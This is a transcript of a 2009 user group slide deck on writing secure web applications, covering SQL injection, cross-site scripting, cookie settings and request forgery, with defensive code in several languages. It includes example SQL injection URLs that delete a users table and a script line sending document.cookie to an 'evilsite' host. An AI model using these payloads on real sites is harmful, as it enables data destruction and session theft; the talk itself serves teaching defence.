Presentation is loading. Please wait.

Presentation is loading. Please wait.

Twin Cities Java User Group Introduction to Writing Secure Web Applications March 9th, 2009 Jason Dean Minnesota Department of Health.

Published byMaurice Bennett Modified over 9 years ago

Similar presentations

Presentation on theme: "Twin Cities Java User Group Introduction to Writing Secure Web Applications March 9th, 2009 Jason Dean Minnesota Department of Health."— Presentation transcript:

1 Twin Cities Java User Group Introduction to Writing Secure Web Applications March 9th, 2009 Jason Dean Minnesota Department of Health

2 Who am I? Web Application Developer with the Minnesota Department of Health (MDH)‏ Chairperson and User Group Manager of the MDH ColdFusion User Group Web Development Blogger (http://www.12robots.com) Veteran of the U.S. Coast Guard

3 What is Application Security? Measures taken to prevent the exploitation of an application or the system that runs the application through defects in the design, development or deployment of the application

4 How do I know if my application is secure? If you have to ask, then it is not.

5 Make my application secure?

6 Assets Flash Files Images Servers System Files Databases Configuration Files

7 Threats The basics –Cross-Site Scripting XSS –Cookie Misuse/Exploits –SQL Injection –Request Forgeries (on-site and cross-site)‏ –Input Validation Exploits –File Uploads The Advanced –Session Management Attacks –Authorization/Authentication –Access Control Attacks –Parameter Manipulation The less obvious  Ignorance  Assumptions  Laziness  Internal threats

8 Discover Vulnerabilities Code Review Scanners Release Source Attack Experts

9 Countermeasures Countermeasures mitigate attacks Out-Of-The-Box Custom Test and Retest Do not touch Certify

10 What are we going to talk about? The Basic:  SQL Injection  Cross-Site Scripting (XSS)  Cookies  Request Forgeries The less obvious:  Ignorance  Assumptions  Laziness

11 Ignorance A long habit of not thinking a thing wrong gives it a superficial appearance of being right. - Thomas Paine

12 Assumptions about users Two things are infinite: the universe and human stupidity; and I'm not sure about the universe. - Albert Einstein

13 Assumptions About Hackers Why would a hacker have any interest in your site? Vandalism Identity Theft Activism Hackers will not use your site as you intend, either

14 Assumptions about administrator/host Configured correctly? Settings enabled? Work together to review configuration Control at the application level Hire an Expert

15 Assumptions about how the server/environment work Secret URLs Firewall Google Web Server Logs Internal Traffic Hidden Fields Javascript

16 Laziness Security Testing Code Review Learning Too Hard, Too much research Don't have enough time?

17 The Basic Threats SQL Injection Cross-Site Scripting XSS Cookie Misuse/Exploits Request Forgeries

18 SQL Injection Obtain, Change or Destroy Data Execute System Commands Easy to do Easy to stop Any DBMS

19 SQL Injection Examples String query = "SELECT * FROM users WHERE userid = " + userid; http://www.12robots.com/?userid=1303 URL, Form and Cookie parameters can be used as part of a SQL statement. Would probably be used in a query like this:

20 SQL Injection Examples www.12robots.com/?userid=1303 http://www.12robots.com/?userid=1303;+DELETE+FROM+users;-- Would Become

21 SQL Injection Examples (cont)‏ http://www.12robots.com/?userid=1303;+DELETE+FROM+users;-- SELECT username, firstname FROM users WHERE userid = 1303; DELETE FROM customers;-- Would result in this query

22 SQL Injection Examples (cont)‏ http://www.12robots.com/?userid=1303%20OR%201=1;-- SELECT username, firstname FROM users WHERE userid = 1303 OR 1=1;-- Would result in this query

23 Stopping SQL Injection Example http://www.12robots.com/?username=Jason&password=myPass I know we don’t send passwords in the URL, this is a demo, this would work just as well in a form field http://www.12robots.com/?username=Jason'-&password=noPass SELECT username, firstname FROM users WHERE username = 'jason'-- ' AND password = ‘myPass’ SELECT username, firstname FROM users WHERE username = 'jason''-- ' AND password = 'myPass' So if you had a URL for login in that looked like And a hacker tried to inject a single quote and double-dash If you did not have a parameterized query, you'd get hacked But with a parameterized query, you'd be safe

24 Prepared Statements in Action ColdFusion on an Integer OR on an String SELECT username, firstname FROM users WHERE userid = SELECT username, firstname FROM users WHERE userid =

25 Prepared Statements in Action Java Prepare a string: Prepare an Integer: String query = "SELECT id, fname, lname FROM authors WHERE fname = ? and lname = ?"; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, fname ); pstmt.setString( 2, lname ); ResultSet results = pstmt.execute( ); String query = "SELECT id, fname, lname FROM authors WHERE id = ?”; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setInt( 1, id ); ResultSet results = pstmt.execute( );

26 Prepared Statements in Action C# Prepare a string: IDbCommand cmdUserInputText = conn.CreateCommand(); cmdUserInputText.CommandType= System.Data.CommandType.Text; cmdUserInputText.CommandText = "SELECT * FROM titles WHERE title_id=@title_id"; IDbDataParameter userParam = cmdUserInputText.CreateParameter(); userParam.Value = "myTitleID"; userParam.DbType = System.Data.DbType.String; cmdUserInputText.Parameters.Add(userParam);

27 Prepared Statements in Action PHP with MySQLi Prepare an Integer: Prepare a String $db_conn = new mysqli("localhost", "user", "pass", "db"); $statement = $db_conn->prepare("SELECT username FROM users WHERE id = ?"); $statement->bind_param("i", $id); $statement->execute(); $db_conn = new mysqli("localhost", "user", "pass", "db"); $statement = $db_conn->prepare("SELECT id FROM users WHERE username = ?"); $statement->bind_param("s", $username); $statement->execute();

28 What about other Dynamic Elements in SQL? SELECT username, firstname FROM users ORDER BY username #sortOrder# SELECT username, firstname FROM users ORDER BY username ASC DESC

29 Cross-Site Scripting (XSS)‏ Injection Attack One user attacks another Many uses Any user input Usually JavaScript

30 XSS Example You have a comments text box, like so: And some joker decides to inject some Javascript: Then when someone views the page that displays that comment, they get:

31 XSS Uses document.location=”http://www.evilsite.com?cookie=” + document.cookie;

32 XSS iFrame Example When another user views the output of that comment later, they will see a form prompting for their user/pass, if they enter and hit “submit” the form will be posted to the evil site.

33 XSS Prevention‏ So how do we protect against this type of attack? Turn on script protection (ColdFusion) Use character encoding functions on all dynamic output User Input validation Use a security API or Framework for your specific language

34 Character Encoding alert('Hacked!'); <script type=”text/javascript”>alert('Hacked!');</script> This: This is Bold Text Would become: This is <strong>Bold Text</strong> And when displayed:This is Bold Text Instead of like: This is Bold Text

35 Character Encoding Function ColdFusion Java Java ESAPI PHP C# import org.w3c.tidy.servlet.util.HTMLEncode //jTidy encode(String); #HTMLEncodedFormat(String)# ESAPI.encoder().encodeForHTML(String); Server.HtmlEncode(String);

36 Cookie Security

37 Cookie Parameters Name Value Expires Path Domain Secure HTTPOnly

38 Cookie Domain and Path www.awesomebloggers.com 12robots.awesomebloggers.com domain=”.awesomebloggers.com” hacker.awesomebloggers.com domain=”.12robots.awesomebloggers.com” www.awesomebloggers.com/12robots Path=”/” www.awesomeblogers.com/hacker path=”/12robots”

39 Setting the HTTPOnly Flag response.setHeader("Set-Cookie", "name=value; HTTPOnly"); HttpCookie myCookie = new HttpCookie("myCookie"); myCookie.HttpOnly = true; Response.AppendCookie(myCookie); ColdFusion Java PHP C#

40 What is a Request Forgery? A request forgery, also sometimes called a Cross-Site (or On-Site) Request Forgery(XSRF), is an attack that is perpetrated against the user of a site who has authenticated access to that site

41 That was confusing How about an Example? Delete page/function single parameter PageID Admin Only All is good, right?

42 What happened?

43 So what can we do about it? It probably:  Receives the request  Checks to make sure the user is logged in  Confirms that the ID is valid  Performs the action

44 How do we fix it? //pseudo-code session.add(“key”, createUUID()); session.add(“keyExpires”, DateAdd('m', 10, Now());

45 How do we fix it? Pseudo-code If (exists(sessionkey) && exists(formkey) && !(isExpired(formKey, keyExpires)) && sessionkey == formKey) { //Delete the key from the session so it can't be reused delete(sessionkey); } else { //Relocate the request if the key is not present or doesn't match log(securityInfo); request.location(webroot); //or throw an Exception } //Finish Processing the request

46 Questions? Please ask your questions now Comments? Jason Dean jason@12robots.com http://www.12robots.com

Download ppt "Twin Cities Java User Group Introduction to Writing Secure Web Applications March 9th, 2009 Jason Dean Minnesota Department of Health."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Twin Cities ColdFusion User Group Intro to Application Security Part 2 October 1st, 2008 Jason Dean

Twin Cities ColdFusion User Group Intro to Application Security Part 2 October 1st, 2008 Jason Dean
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.

-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.

Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

Similar presentations

Ads by Google